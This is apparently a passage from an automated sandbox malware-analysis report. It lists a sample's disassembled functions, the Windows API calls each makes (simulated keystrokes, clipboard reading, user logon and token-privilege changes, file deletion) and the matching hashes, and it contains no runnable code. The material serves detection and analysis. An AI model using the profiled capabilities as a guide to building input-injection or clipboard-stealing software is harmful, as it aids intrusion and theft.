                                                                                • Instruction Fuzzy Hash: 9D426E34204741AFEB24DF28CC44AAABBEAFF4A320F140619F995C73A1D771A855CF61
                                                                                Function 00664873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 006648F3
                                                                                • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00664908
                                                                                • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00664927
                                                                                • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0066494B
                                                                                • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0066495C
                                                                                • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0066497B
                                                                                • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 006649AE
                                                                                • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 006649D4
                                                                                • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00664A0F
                                                                                • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00664A56
                                                                                • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00664A7E
                                                                                • IsMenu.USER32(?), ref: 00664A97
                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00664AF2
                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00664B20
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00664B94
                                                                                • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00664BE3
                                                                                • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00664C82
                                                                                • wsprintfW.USER32 ref: 00664CAE
                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00664CC9
                                                                                • GetWindowTextW.USER32(?,00000000,00000001), ref: 00664CF1
                                                                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00664D13
                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00664D33
                                                                                • GetWindowTextW.USER32(?,00000000,00000001), ref: 00664D5A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                • String ID: %d/%02d/%02d
                                                                                • API String ID: 4054740463-328681919
                                                                                • Opcode ID: c69dba0b68ec2466ab14c72606df45363f28cb27ff0067abaa524bf8d6128f0c
                                                                                • Instruction ID: 8ffb4ab2b65f4e1d8fdb338d676f01b2d88b69a95695aa6d28ca2dff27c112f0
                                                                                • Opcode Fuzzy Hash: c69dba0b68ec2466ab14c72606df45363f28cb27ff0067abaa524bf8d6128f0c
                                                                                • Instruction Fuzzy Hash: 3B12FD71600245ABEB249F28DC49FBE7BBAEF85710F104129F516EB2E1DBB4A941CB50
                                                                                Function 005EF98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 005EF998
                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0062F474
                                                                                • IsIconic.USER32(00000000), ref: 0062F47D
                                                                                • ShowWindow.USER32(00000000,00000009), ref: 0062F48A
                                                                                • SetForegroundWindow.USER32(00000000), ref: 0062F494
                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0062F4AA
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0062F4B1
                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0062F4BD
                                                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 0062F4CE
                                                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 0062F4D6
                                                                                • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0062F4DE
                                                                                • SetForegroundWindow.USER32(00000000), ref: 0062F4E1
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0062F4F6
                                                                                • keybd_event.USER32(00000012,00000000), ref: 0062F501
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0062F50B
                                                                                • keybd_event.USER32(00000012,00000000), ref: 0062F510
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0062F519
                                                                                • keybd_event.USER32(00000012,00000000), ref: 0062F51E
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0062F528
                                                                                • keybd_event.USER32(00000012,00000000), ref: 0062F52D
                                                                                • SetForegroundWindow.USER32(00000000), ref: 0062F530
                                                                                • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0062F557
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                • String ID: Shell_TrayWnd
                                                                                • API String ID: 4125248594-2988720461
                                                                                • Opcode ID: ba88ca4ca7f9d305f1c150a532290d59cb5263e47d953f2f708c0541d4e5e12c
                                                                                • Instruction ID: 48cb7cb53aa22b34cf43321034f127526fa64e73b3a7d9c0c6dfbcabb208da45
                                                                                • Opcode Fuzzy Hash: ba88ca4ca7f9d305f1c150a532290d59cb5263e47d953f2f708c0541d4e5e12c
                                                                                • Instruction Fuzzy Hash: 14316371A40668BBEB206BB59C4AFBF7E7EEB44B60F101026F641F61D1C6F15D10AE60
                                                                                Function 00631201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 006316C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0063170D
                                                                                  • Part of subcall function 006316C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0063173A
                                                                                  • Part of subcall function 006316C3: GetLastError.KERNEL32 ref: 0063174A
                                                                                • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00631286
                                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 006312A8
                                                                                • CloseHandle.KERNEL32(?), ref: 006312B9
                                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 006312D1
                                                                                • GetProcessWindowStation.USER32 ref: 006312EA
                                                                                • SetProcessWindowStation.USER32(00000000), ref: 006312F4
                                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00631310
                                                                                  • Part of subcall function 006310BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006311FC), ref: 006310D4
                                                                                  • Part of subcall function 006310BF: CloseHandle.KERNEL32(?,?,006311FC), ref: 006310E9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                • String ID: $default$winsta0$Zi
                                                                                • API String ID: 22674027-3349466720
                                                                                • Opcode ID: fb35c0b514511f8baac02fe21bd1516e994f264f927c806f9ea00f0c00b2e0ae
                                                                                • Instruction ID: d37f1721c7a2863d25b9a3e7a4811d239b7ef1a575189f81662c8c0d09ca70ac
                                                                                • Opcode Fuzzy Hash: fb35c0b514511f8baac02fe21bd1516e994f264f927c806f9ea00f0c00b2e0ae
                                                                                • Instruction Fuzzy Hash: E8819A71900309AFDF219FA4DC49BFE7BBAEF05700F144129F911AA2A1CB758A44CBA4
                                                                                Function 00630B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 006310F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00631114
                                                                                  • Part of subcall function 006310F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00630B9B,?,?,?), ref: 00631120
                                                                                  • Part of subcall function 006310F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00630B9B,?,?,?), ref: 0063112F
                                                                                  • Part of subcall function 006310F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00630B9B,?,?,?), ref: 00631136
                                                                                  • Part of subcall function 006310F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0063114D
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00630BCC
                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00630C00
                                                                                • GetLengthSid.ADVAPI32(?), ref: 00630C17
                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00630C51
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00630C6D
                                                                                • GetLengthSid.ADVAPI32(?), ref: 00630C84
                                                                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00630C8C
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00630C93
                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00630CB4
                                                                                • CopySid.ADVAPI32(00000000), ref: 00630CBB
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00630CEA
                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00630D0C
                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00630D1E
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00630D45
                                                                                • HeapFree.KERNEL32(00000000), ref: 00630D4C
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00630D55
                                                                                • HeapFree.KERNEL32(00000000), ref: 00630D5C
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00630D65
                                                                                • HeapFree.KERNEL32(00000000), ref: 00630D6C
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00630D78
                                                                                • HeapFree.KERNEL32(00000000), ref: 00630D7F
                                                                                  • Part of subcall function 00631193: GetProcessHeap.KERNEL32(00000008,00630BB1,?,00000000,?,00630BB1,?), ref: 006311A1
                                                                                  • Part of subcall function 00631193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00630BB1,?), ref: 006311A8
                                                                                  • Part of subcall function 00631193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00630BB1,?), ref: 006311B7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                • String ID:
                                                                                • API String ID: 4175595110-0
                                                                                • Opcode ID: 12c83720e8e00fc83924e3d8111d8d25efcc1bd2163ddcbc84686daa92d2e278
                                                                                • Instruction ID: 3fe3ebe5700566fdbae06e2c2512b7f630f3432c1e2f1fa1433c65f8864b001d
                                                                                • Opcode Fuzzy Hash: 12c83720e8e00fc83924e3d8111d8d25efcc1bd2163ddcbc84686daa92d2e278
                                                                                • Instruction Fuzzy Hash: 9B715B7290020AABEF10DFA4DC44FEEBBBABF09310F144555E955A7291D7B1A909CBA0
                                                                                Function 0064EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenClipboard.USER32(0066CC08), ref: 0064EB29
                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0064EB37
                                                                                • GetClipboardData.USER32(0000000D), ref: 0064EB43
                                                                                • CloseClipboard.USER32 ref: 0064EB4F
                                                                                • GlobalLock.KERNEL32(00000000), ref: 0064EB87
                                                                                • CloseClipboard.USER32 ref: 0064EB91
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0064EBBC
                                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 0064EBC9
                                                                                • GetClipboardData.USER32(00000001), ref: 0064EBD1
                                                                                • GlobalLock.KERNEL32(00000000), ref: 0064EBE2
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0064EC22
                                                                                • IsClipboardFormatAvailable.USER32(0000000F), ref: 0064EC38
                                                                                • GetClipboardData.USER32(0000000F), ref: 0064EC44
                                                                                • GlobalLock.KERNEL32(00000000), ref: 0064EC55
                                                                                • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0064EC77
                                                                                • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0064EC94
                                                                                • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0064ECD2
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0064ECF3
                                                                                • CountClipboardFormats.USER32 ref: 0064ED14
                                                                                • CloseClipboard.USER32 ref: 0064ED59
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                • String ID:
                                                                                • API String ID: 420908878-0
                                                                                • Opcode ID: 612d7e3d91fe67673ddf86a10d477c8e0087c8cd2d208a93f8a3228d8fe6d557
                                                                                • Instruction ID: 47bee5303fc66d92afb3edd68c3ed9271ee8b72b3d100fd33ca8d25e6e37c2d9
                                                                                • Opcode Fuzzy Hash: 612d7e3d91fe67673ddf86a10d477c8e0087c8cd2d208a93f8a3228d8fe6d557
                                                                                • Instruction Fuzzy Hash: 6561AD342042429FD310EF24D898F7A7BA6FF84714F14551AF896973A1DB72ED06CBA2
                                                                                Function 0064698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 006469BE
                                                                                • FindClose.KERNEL32(00000000), ref: 00646A12
                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00646A4E
                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00646A75
                                                                                  • Part of subcall function 005D9CB3: _wcslen.LIBCMT ref: 005D9CBD
                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00646AB2
                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00646ADF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                • API String ID: 3830820486-3289030164
                                                                                • Opcode ID: b5cd32087490afa228f325bf244e04aa7b5d33f3a20e08cf15912bc177f3df6f
                                                                                • Instruction ID: 0c9f2d783f297dcfc4ed10a529389818868d0b9cad60c54918f3eba5ea83bfe6
                                                                                • Opcode Fuzzy Hash: b5cd32087490afa228f325bf244e04aa7b5d33f3a20e08cf15912bc177f3df6f
                                                                                • Instruction Fuzzy Hash: 9BD16F72508341AFC314EBA4C895EABBBECBFC8704F44491EF585C6291EB74DA44CB62
                                                                                Function 00649642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00649663
                                                                                • GetFileAttributesW.KERNEL32(?), ref: 006496A1
                                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 006496BB
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 006496D3
                                                                                • FindClose.KERNEL32(00000000), ref: 006496DE
                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 006496FA
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0064974A
                                                                                • SetCurrentDirectoryW.KERNEL32(00696B7C), ref: 00649768
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00649772
                                                                                • FindClose.KERNEL32(00000000), ref: 0064977F
                                                                                • FindClose.KERNEL32(00000000), ref: 0064978F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                • String ID: *.*
                                                                                • API String ID: 1409584000-438819550
                                                                                • Opcode ID: dc8211706c0f2e05ba1743838eaa4f09f44c177b6a9fa423632edcf6bbbaa5de
                                                                                • Instruction ID: dccbf2f0e899cc2ed822244c73b5075354a267c00b0f4b2cd265f9505616490e
                                                                                • Opcode Fuzzy Hash: dc8211706c0f2e05ba1743838eaa4f09f44c177b6a9fa423632edcf6bbbaa5de
                                                                                • Instruction Fuzzy Hash: 2D31D3326806196EDF14EFB4DC18AEF77AEAF49320F104156F955E2290EB74DE40CB64
                                                                                Function 0064979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 006497BE
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00649819
                                                                                • FindClose.KERNEL32(00000000), ref: 00649824
                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00649840
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00649890
                                                                                • SetCurrentDirectoryW.KERNEL32(00696B7C), ref: 006498AE
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 006498B8
                                                                                • FindClose.KERNEL32(00000000), ref: 006498C5
                                                                                • FindClose.KERNEL32(00000000), ref: 006498D5
                                                                                  • Part of subcall function 0063DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0063DB00
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                • String ID: *.*
                                                                                • API String ID: 2640511053-438819550
                                                                                • Opcode ID: 22c73ee327c5ee2ad7168a4e2eddc31f9571e0d65127d95204d4677e439c84fe
                                                                                • Instruction ID: b7be0c1296b64d8192ab9bbf70c157fafca593fcc87e30e5fcdbb9db4f77425d
                                                                                • Opcode Fuzzy Hash: 22c73ee327c5ee2ad7168a4e2eddc31f9571e0d65127d95204d4677e439c84fe
                                                                                • Instruction Fuzzy Hash: A831D4315806196EDF10EFB8EC48AEF77AEAF46330F104556F950A2290EB70DA45CB74
                                                                                Function 00648195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?), ref: 00648257
                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00648267
                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00648273
                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00648310
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00648324
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00648356
                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0064838C
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00648395
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentDirectoryTime$File$Local$System
                                                                                • String ID: *.*
                                                                                • API String ID: 1464919966-438819550
                                                                                • Opcode ID: 38fddf497338e15e997010a79fc11a1026a8431e60239df5e1a46fee31714846
                                                                                • Instruction ID: f55c88f2284332787ba9a84c11da9900f8cda15ffcbbe8bc0255b65302287a36
                                                                                • Opcode Fuzzy Hash: 38fddf497338e15e997010a79fc11a1026a8431e60239df5e1a46fee31714846
                                                                                • Instruction Fuzzy Hash: A56158725043069FCB10EF64C8449AFB7EAFF89310F04891EF98997251EB31EA45CB92
                                                                                Function 0063D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005D3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005D3A97,?,?,005D2E7F,?,?,?,00000000), ref: 005D3AC2
                                                                                  • Part of subcall function 0063E199: GetFileAttributesW.KERNEL32(?,0063CF95), ref: 0063E19A
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0063D122
                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0063D1DD
                                                                                • MoveFileW.KERNEL32(?,?), ref: 0063D1F0
                                                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 0063D20D
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0063D237
                                                                                  • Part of subcall function 0063D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0063D21C,?,?), ref: 0063D2B2
                                                                                • FindClose.KERNEL32(00000000,?,?,?), ref: 0063D253
                                                                                • FindClose.KERNEL32(00000000), ref: 0063D264
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                • String ID: \*.*
                                                                                • API String ID: 1946585618-1173974218
                                                                                • Opcode ID: defe37601f66f21ffa16956d382e21e16c5e307f37c8f210e6c871957b5c3448
                                                                                • Instruction ID: 2a561cbd6c815ab87db4251965b4054bc5672936f2c42b456f0e7220d24929b1
                                                                                • Opcode Fuzzy Hash: defe37601f66f21ffa16956d382e21e16c5e307f37c8f210e6c871957b5c3448
                                                                                • Instruction Fuzzy Hash: 2861803190110E9BCF15EBE4E9569EEBB7ABF95300F244066E40173291EB315F09DBA1
                                                                                Function 0064ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
